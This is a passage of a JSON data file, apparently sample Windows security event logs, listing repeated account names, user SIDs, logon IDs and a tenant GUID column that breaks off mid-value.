tsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"NaN\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\"],\"SubjectUserSid\":[\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"NaN\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\"],\"TargetLogonId\":[\"NaN\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"NaN\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x0\",\"0x3e4\",\"0x0\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x0\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e4\",\"0x3e5\",\"0x3e4\",\"0x3e4\",\"NaN\",\"0x0\",\"0xfaac27\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0xfaac27\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"NaN\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"NaN\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"NaN\",\"0x0\",\"0x0\",\"0x0\"],\"TenantId\":[\"NaN\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d7